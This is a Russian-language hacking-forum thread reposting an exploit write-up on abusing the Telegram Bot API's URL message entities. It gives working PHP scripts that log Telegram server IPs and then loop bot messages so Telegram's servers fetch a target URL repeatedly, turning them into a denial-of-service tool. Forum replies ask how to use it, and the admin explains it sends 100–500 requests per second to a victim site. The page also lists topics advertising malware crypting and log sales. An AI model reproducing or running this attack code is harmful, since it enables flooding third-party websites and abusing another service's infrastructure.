Telegram Bot API Cross Site Request Forgery / Denial Of Service Vulnerability

Admin · 29.11.2016

Код:

###########################

# Telegram Bot API Cross Site Request Forgery / Denial Of Service Vulnerability

###########################

# Exploit Title : Telegram Bot API CSRF Vulnerability and use it as a ddoser
# Exploit Author : 4L1R3Z4
# Date : 2016/08/15
# Google Dork : No
# Home Page : https://core.telegram.org/bots/api
# Category : Web Application
# Discovered by : 4L1R3Z4
==============================
# Description :
==============================
In new version of telegram bot api, a new object called "MessageEntity" permits you that send Urls as
message. By this object, We can achieve GET request from telegram server.
Telegram doesn't check that the image is real or not, and also it doesn't have a captcha or securtiy token
so we can run our php files through Telegram Server
==============================
# Proof Of Concepts :
==============================
In this section, I'll show you that how you can grab telegram Server IP
create a folder named "tg" on your host and create a .htaccess file in that with the following contents:
-------------
ErrorDocument 404 /tg/log.php
-------------
And this is the "log.php":
--------------------------------------------
<?php
function getUserIP()
{
  $client  = @$_SERVER['HTTP_CLIENT_IP'];
  $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
  $remote  = $_SERVER['REMOTE_ADDR'];
  if(filter_var($client, FILTER_VALIDATE_IP))
  {
  $ip = $client;
  }
  elseif(filter_var($forward, FILTER_VALIDATE_IP))
  {
  $ip = $forward;
  }
  else
  {
  $ip = $remote;
  }
  return $ip. PHP_EOL;
}
$user_ip = getUserIP();
$logfile= 'log.txt';
$fp = fopen($logfile, "a");
fwrite($fp, $user_ip, strlen($user_ip));
fclose($fp);
?>
----------------------------------------------
and a file called "request.php" with this contets:
-----------------------
<?php
function random_string($length) {
  $key = '';
  $keys = array_merge(range(0, 9), range('a', 'z'));
  for ($i = 0; $i < $length; $i++) {
  $key .= $keys[array_rand($keys)];
  }
  return $key;
}
$update = json_decode(file_get_contents('php://input'));
$rep=json_decode(file_get_contents("https://api.telegram.org/bot[YOUR BOT Token]/SendMessage?chat_id=".$update->message->chat->id."&parse_mode=HTML&text=".urldecode("<a href=\"https://YOUR HOST.com/tg/".random_string(50).".png\">".'test'."</a>")));
?>
-------------------------
Then activate WebHook for you bot and set the "request.php" address for web hook,
Then, Send a message to your bot, if you do everything right, the IP will write on "log.txt" file


************
************ Exploiting it to ddos
************

Change request.php with this:
--------------------------------------------
<?php
function random_string($length) {
  $key = '';
  $keys = array_merge(range(0, 9), range('a', 'z'));
  for ($i = 0; $i < $length; $i++) {
  $key .= $keys[array_rand($keys)];
  }
  return $key;
}
$update = json_decode(file_get_contents('php://input'));
for($i=0;$i<100;$i++){
$rep=json_decode(file_get_contents("https://api.telegram.org/bot[YOUR BOT Token]/SendMessage?chat_id=".$update->message->chat->id."&parse_mode=HTML&text=".urldecode("<a href=\"https://YOUR HOST.com/tg/".random_string(50).".png\">".'test'."</a>")));
}
?>
--------------------------------------------

and change log.php with this:

--------------------------------------------
<?php
echo file_get_contents("http://exampledomain.com");
?>
---------------------------------------------

This code will send 100 requests to "exampledomain.com" from telegram IP
You can increase or decrease the request numbers depending on your server features
Also you can exploit it through IRC servers if your server is not strong.


Exploited by 4L1R3Z4

dkfancska · 29.11.2016

Admin сказал(а):

Код:

###########################

# Telegram Bot API Cross Site Request Forgery / Denial Of Service Vulnerability

###########################

# Exploit Title : Telegram Bot API CSRF Vulnerability and use it as a ddoser
# Exploit Author : 4L1R3Z4
# Date : 2016/08/15
# Google Dork : No
# Home Page : https://core.telegram.org/bots/api
# Category : Web Application
# Discovered by : 4L1R3Z4
==============================
# Description :
==============================
In new version of telegram bot api, a new object called "MessageEntity" permits you that send Urls as
message. By this object, We can achieve GET request from telegram server.
Telegram doesn't check that the image is real or not, and also it doesn't have a captcha or securtiy token
so we can run our php files through Telegram Server
==============================
# Proof Of Concepts :
==============================
In this section, I'll show you that how you can grab telegram Server IP
create a folder named "tg" on your host and create a .htaccess file in that with the following contents:
-------------
ErrorDocument 404 /tg/log.php
-------------
And this is the "log.php":
--------------------------------------------
<?php
function getUserIP()
{
  $client  = @$_SERVER['HTTP_CLIENT_IP'];
  $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
  $remote  = $_SERVER['REMOTE_ADDR'];
  if(filter_var($client, FILTER_VALIDATE_IP))
  {
  $ip = $client;
  }
  elseif(filter_var($forward, FILTER_VALIDATE_IP))
  {
  $ip = $forward;
  }
  else
  {
  $ip = $remote;
  }
  return $ip. PHP_EOL;
}
$user_ip = getUserIP();
$logfile= 'log.txt';
$fp = fopen($logfile, "a");
fwrite($fp, $user_ip, strlen($user_ip));
fclose($fp);
?>
----------------------------------------------
and a file called "request.php" with this contets:
-----------------------
<?php
function random_string($length) {
  $key = '';
  $keys = array_merge(range(0, 9), range('a', 'z'));
  for ($i = 0; $i < $length; $i++) {
  $key .= $keys[array_rand($keys)];
  }
  return $key;
}
$update = json_decode(file_get_contents('php://input'));
$rep=json_decode(file_get_contents("https://api.telegram.org/bot[YOUR BOT Token]/SendMessage?chat_id=".$update->message->chat->id."&parse_mode=HTML&text=".urldecode("<a href=\"https://YOUR HOST.com/tg/".random_string(50).".png\">".'test'."</a>")));
?>
-------------------------
Then activate WebHook for you bot and set the "request.php" address for web hook,
Then, Send a message to your bot, if you do everything right, the IP will write on "log.txt" file


************
************ Exploiting it to ddos
************

Change request.php with this:
--------------------------------------------
<?php
function random_string($length) {
  $key = '';
  $keys = array_merge(range(0, 9), range('a', 'z'));
  for ($i = 0; $i < $length; $i++) {
  $key .= $keys[array_rand($keys)];
  }
  return $key;
}
$update = json_decode(file_get_contents('php://input'));
for($i=0;$i<100;$i++){
$rep=json_decode(file_get_contents("https://api.telegram.org/bot[YOUR BOT Token]/SendMessage?chat_id=".$update->message->chat->id."&parse_mode=HTML&text=".urldecode("<a href=\"https://YOUR HOST.com/tg/".random_string(50).".png\">".'test'."</a>")));
}
?>
--------------------------------------------

and change log.php with this:

--------------------------------------------
<?php
echo file_get_contents("http://exampledomain.com");
?>
---------------------------------------------

This code will send 100 requests to "exampledomain.com" from telegram IP
You can increase or decrease the request numbers depending on your server features
Also you can exploit it through IRC servers if your server is not strong.


Exploited by 4L1R3Z4

А можно поподробнее что с этим делать

HATRED · 30.11.2016

+ тоже интересно

Admin · 30.11.2016

В новой версии телеграма бот API, новый объект под названием "MessageEntity" позволяет Вам, отправить Urls
сообщения. К этому объекту, мы можем посылать запрос GET из телеграм сервера.
Телеграм не проверяет, изображение реально или нет, а также он не имеет капчи и секьюрити токена, так что мы можем запустить наши PHP файлы через Телеграм сервер и посылаем на сайт жертвы около 100-500 запросов в секунду.

HATRED · 02.12.2016

Admin сказал(а):
В новой версии телеграма бот API, новый объект под названием "MessageEntity" позволяет Вам, отправить Urls
сообщения. К этому объекту, мы можем посылать запрос GET из телеграм сервера.
Телеграм не проверяет, изображение реально или нет, а также он не имеет капчи и секьюрити токена, так что мы можем запустить наши PHP файлы через Телеграм сервер и посылаем на сайт жертвы около 100-500 запросов в секунду.

спасибо за ответ

E	AML Detect Bot в telegram	Все остальное	0	23.04.2026
	✅USMobileSMSBot - Telegram Bot (24/7) SMS ВЕРИФИКАЦИИ НА РЕАЛЬНЫЕ НОМЕРА USA ОДНОРАЗОВАЯ И ДОЛГОСРОЧНАЯ АРЕНДА Non-VoIP.	Ищу работу. Предлагаю свои услуги.	0	19.04.2025
C	Крипт за €15 \| Fryp Files ~ €15 - Telegram BOT: @cryptmodebot \| Auto Crypt Files 24/7	Ищу работу. Предлагаю свои услуги.	0	06.01.2021
B	Разработаю️ ▷Создам Телеграм/VK Бота ▷ ️ Creat Telegram/VKontakte Bot	Ищу работу. Предлагаю свои услуги.	0	02.02.2020
B	[МАГАЗИН] Telegram Bot Logs Seller	Платёжные системы: обмен, трансфер, разблокировка	0	05.09.2019
N	Telegram bot (ИНТЕРАКТИВНАЯ ТЕМА ДЛЯ ОБЩЕГО ЗАРАБОТКА).	Способы заработка	2	18.11.2018
S	[PHP] Telegram Bot	Программирование	3	15.08.2018
	Интересно Иранская разведка использует Telegram для вербовки шпионов и поджигателей.	Новости в сети	0	Среда в 12:45
	Интересно Telegram снова теряет прокси. Пользователи в России жалуются на массовые сбои MTProto и VPN.	Новости в сети	0	27.05.2026
	Интересно В Android-сборке Telegram обнаружен шпионский троян.	Новости в сети	0	24.05.2026
	Интересно Мошенники используют страх перед дронами для взлома Telegram.	Новости в сети	0	21.05.2026
	Интересно Telegram обновился до версии 12.7: новые функции для каналов, групп и ИИ-редактора.	Новости в сети	0	07.05.2026
	Интересно Мошенники используют Telegram Mini Apps для обмана инвесторов.	Новости в сети	0	05.05.2026
	SENTINAL \| Сервис блокировки Доменов и Telegram серой/черной тематики: боты, аккаунты, чаты, каналы	Ищу работу. Предлагаю свои услуги.	1	27.04.2026
	Интересно Британские власти начали проверку Telegram из-за распространения материалов с насилием над детьми.	Новости в сети	0	22.04.2026
	Интересно Telegram представил обновлённый Login Widget для сайтов и сервисов.	Новости в сети	0	19.04.2026
	Интересно Криминальный рынок Xinbi Guarantee продолжает работать в Telegram, несмотря на санкции.	Новости в сети	0	17.04.2026
	Интересно Telegram нашёл новый способ обхода блокировок в России.	Новости в сети	0	17.04.2026
	Интересно Apple признала альтернативный клиент Telegram опасным вирусом.	Новости в сети	0	17.04.2026
	Интересно Telegram-прокси начали массово отключаться с 1 апреля.	Новости в сети	0	02.04.2026
	Интересно Telegram тестирует уведомление о последней возможности оплатить Premium.	Новости в сети	0	31.03.2026
	Интересно В Telegram обнаружена уязвимость, позволяющая захватить устройство через анимированные стикеры.	Новости в сети	0	30.03.2026
	Интересно Telegram на Android получил новый неофициальный клиент Monogram.	Новости в сети	0	28.03.2026
	Интересно В Telegram обнаружена критическая уязвимость с оценкой 9,8 из 10.	Новости в сети	0	27.03.2026
	Интересно ФБР предупреждает о кибератаках через Telegram.	Новости в сети	0	24.03.2026
	Интересно VPN не нужен: на Хабре вышел TG Unblock для ускорения Telegram.	Новости в сети	0	24.03.2026
	Интересно Исследователи обнаружили механизм MITM-атаки в популярном клиенте Telegram — Telega.	Новости в сети	0	23.03.2026
	Интересно Иранские хакеры используют Telegram для кибератак на диссидентов.	Новости в сети	0	23.03.2026
	Интересно Киберпреступники адаптировались к новым правилам Telegram.	Новости в сети	0	21.03.2026
	Интересно Telegram работает без сотовой сети и интернета с помощью Raspberry Pi и радиоузлов.	Новости в сети	0	20.03.2026
	Интересно Telegram стал инструментом для кражи данных.	Новости в сети	0	13.03.2026
	Интересно Telegram рассчитывал на VPN. В Госдуме объяснили, почему это не сработает.	Новости в сети	0	12.03.2026
	Интересно ФАС назвала условие для запрета рекламы на YouTube и Telegram.	Новости в сети	0	10.03.2026
	Telegram soft — TG-GIANT \| Бесплатный тест на 2 дня \| Более 15 функций \| Поддержка 24/7 \| Самый стабильный на рынке \| Многопоточность \| Комьюнити	Готовый софт	6	09.02.2026
	Статья Как найти владельца и админа Telegram канала	OSINT	0	05.02.2026
	Интересно Telegram добавит предупреждение. Мессенджер признал проблему с утечкой IP-адресов.	Новости в сети	0	14.01.2026
	Статья Базовый OSINT по Telegram	OSINT	0	12.01.2026
	Касперский: россияне больше верят Telegram-каналам, чем всем новостным сайтам вместе взятым	Новости в сети	0	14.10.2025
	Информационная «золотая лихорадка». Владельцы Telegram-ботов по «пробиву» начали скупать утечки данных до их появления в даркнете	Новости в сети	0	09.10.2025
	Киберпартизаны создали собственную версию Telegram с функцией самоуничтожения переписки	Новости в сети	0	01.08.2025
	Когда-то блокировали — теперь ждут с документами: Telegram идёт в Роскомнадзор	Новости в сети	0	18.07.2025
	Telegram победил рынок фрода на $35 млрд… но всего на пару дней	Новости в сети	0	25.06.2025
	Telegram, WhatsApp и другие — теперь в зоне прослушки? В России хотят мониторить мессенджеры в реальном времени	Новости в сети	0	25.06.2025
	Раскрыта структура 16-миллиардной утечки: 30 баз, крупнейшая — португальская, среди них — российская и Telegram	Новости в сети	0	23.06.2025
	Шпион из ЦРУ превратил Telegram в площадку для государственной тайны	Новости в сети	0	20.06.2025
	Киберпартизаны атакуют: новый бэкдор Vasilek использует Telegram для управления зараженными системами	Новости в сети	0	14.06.2025
	Услуги 18+, отмывание и прописка в США — как один Telegram-рынок объединил КНДР и китайскую мафию	Новости в сети	0	15.05.2025
	Легальный Windows-файл, странный Telegram и исчезнувшие биткоины. Совпадение?	Новости в сети	0	05.05.2025
	Мошенники выдают фальшивые акции банков в Telegram и воруют деньги через фишинг	Новости в сети	0	01.05.2025
	ФБР теперь в Telegram: я верну все, а заодно и заберу остальное	Новости в сети	0	22.04.2025

Telegram Bot API Cross Site Request Forgery / Denial Of Service Vulnerability

Admin

Администратор

dkfancska

HATRED

Admin

Администратор

HATRED

Название темы